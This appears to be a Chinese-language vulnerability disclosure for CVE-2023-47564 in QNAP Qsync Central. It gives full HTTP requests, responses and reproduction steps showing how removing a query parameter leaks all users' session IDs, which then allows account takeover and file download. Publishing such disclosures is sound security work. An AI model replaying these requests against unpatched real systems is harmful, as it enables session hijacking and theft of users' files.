
CVE-2023-47564
"一个对关键资源的权限分配不正确漏洞已被报告影响 Qsync Central。如果被利用,该漏洞可能允许经过身份验证的用户通过网络读取或修改资源。"
发现日期: 2023年12月5日
修复日期: 2024年2月3日
受影响版本: Qsync Central 4.4.x, Qsync Central 4.3.x
修复版本: Qsync Central 4.4.0.15 (2024/01/04) 及更高版本, Qsync Central 4.3.0.11 (2024/01/11) 及更高版本
摘要:
在最近的一次渗透测试中,我作为一个低权限用户(这里称为 user123)访问了一个 QNAP 系统。没有发现有趣的文件,于是我进一步深入调查。
该系统上仅运行着 Qsync Central App (https://www.qnap.com/en/app_releasenotes/list.php?app_choose=QsyncServer)。
首先,我尝试查找所有可用用户的列表并检查了我的代理历史。我偶然发现了端点 /cgi-bin/qsync/qboxRequest.cgi。
该端点泄露了关于我当前用户账户的信息,实际上还包括我当前的会话 ID(sid)。
请求如下所示:
GET /cgi-bin/qsync/qboxRequest.cgi?sid=60ud018n&_dc=1701766637869&subfunc=qbox&genQboxDeviceList=1&sort=1&filteruser=user123 HTTP/2
Host: vulnhost.com
Cookie: DESKTOP=1; WINDOW_MODE=1; nas_wfm_tree_x=200; QSYNC_SID=60ud018n; QSYNC_USER=user123; NAS_SID=60ud018n; QT=1701766635952
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnhost.com/cgi-bin/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
响应如下:
HTTP/2 200 OK
Server:
[...]
<data>
<device>
<id><![CDATA[REDACTED]]></id>
<type><![CDATA[3]]></type>
<time><![CDATA[2023-12-05 09:57:14]]></time>
<user><![CDATA[user123]]></user>
<ip><![CDATA[REDACTED]]></ip>
<sid><![CDATA[60ud018n]]></sid>
<uid><![CDATA[REDACTED]]></uid>
<action><![CDATA[1]]></action>
<comp><![CDATA[Qsync-File Station]]></comp>
<desc><![CDATA[File Station login Qsync]]></desc>
<channel><![CDATA[0]]></channel>
<online><![CDATA[0]]></online>
<version><![CDATA[]]></version>
<QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
</device>
</data>
<ret>0</ret>
</logroot>
</QDocRoot>
有趣的是 filteruser 参数。我只是将其移除,结果出乎意料地返回了所有用户及其会话 ID 的列表! 因此,我能够劫持每个其他已登录用户的会话。为了概念验证,我使用了其中一个会话来以不同用户身份登录。 我向 QNAP 的漏洞奖励计划报告了此漏洞。沟通很顺畅,修复也迅速部署。
详细复现步骤:
攻击者使用常规的低权限用户账户登录 QNAP Qsync 网络应用程序。
从 Qsync 网络应用程序设置的 NAS_SID cookie 中提取攻击者的会话 ID(sid)。
将攻击者的 sid 值同时用于 NAS_SID cookie 和 HTTP GET 参数 sid,并执行以下 HTTP 请求:
GET /cgi-bin/qsync/qboxRequest.cgi?sid=yl9osz6l&subfunc=qbox&genQboxDeviceList=1&sort=1 HTTP/2
Host: vulnhost.com
Cookie: NAS_SID=yl9osz6l;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://vulnhost.com/cgi-bin/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
所有其他当前登录网络应用程序的用户的有效会话 ID 可以从 HTTP 响应中提取,例如:
HTTP/2 200 OK
Server:
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
Vary: Referer
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/xml
Date: Tue, 05 Dec 2023 10:32:00 GMT
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<authPassed><![CDATA[1]]></authPassed><model><modelName><![CDATA[TS-X71U]]></modelName><internalModelName><![CDATA[TS-X71]]></internalModelName><platform><![CDATA[TS-NASX86]]></platform><platform_ex><![CDATA[X86_HASWELL]]></platform_ex><customModelName><![CDATA[]]></customModelName><displayModelName><![CDATA[TVS-471U-RP]]></displayModelName><sas_model><![CDATA[0]]></sas_model><storage_v2>1</storage_v2>
<encryptfsSupported><![CDATA[1]]></encryptfsSupported></model>
<firmware><version><![CDATA[5.1.1]]></version><number><![CDATA[2491]]></number><build><![CDATA[20230815]]></build><patch><![CDATA[0]]></patch><buildTime><![CDATA[2023/08/15]]></buildTime></firmware>
<sp><![CDATA[ALPHA]]></sp><rfs_bits><![CDATA[32]]></rfs_bits><specVersion><![CDATA[1.0]]></specVersion><hostname><![CDATA[Data]]></hostname><DemoSiteSuppurt><![CDATA[no]]></DemoSiteSuppurt><customLogo><customFrontLogo><![CDATA[]]></customFrontLogo><customLoginLogo><![CDATA[]]></customLoginLogo></customLogo>
<logroot>
<ADSSupport><![CDATA[1]]></ADSSupport><trustedDomain><enable><![CDATA[0]]></enable></trustedDomain>
<count>239</count>
<data>
<device>
<id><![CDATA[REDACTED]]></id>
<type><![CDATA[3]]></type>
<time><![CDATA[2023-12-05 11:31:50]]></time>
<user><![CDATA[victim]]></user>
<ip><![CDATA[REDACTED]]></ip>
<sid><![CDATA[12345678]]></sid></span>
<uid><![CDATA[REDACTED]]></uid>
<action><![CDATA[1]]></action>
<comp><![CDATA[Qsync-File Station]]></comp>
<desc><![CDATA[File Station login Qsync]]></desc>
<channel><![CDATA[0]]></channel>
<online><![CDATA[1]]></online>
<version><![CDATA[]]></version>
<QsyncPath><![CDATA[/home/.Qsync]]></QsyncPath>
</device>
[...]
以下截图展示了此问题(出于隐私考虑,会话 ID 以及已测试 QNAP Qsync 实例的识别信息已被遮盖):
![]() |
|---|
| 泄露的会话 ID 值 |
攻击者可以使用提取出的 sid 值,通过设置相应的 NAS_SID cookie 以任何受害者的身份登录。这使攻击者能够劫持受害者的会话,并下载受害者存储在 QNAP 系统上的任何文件。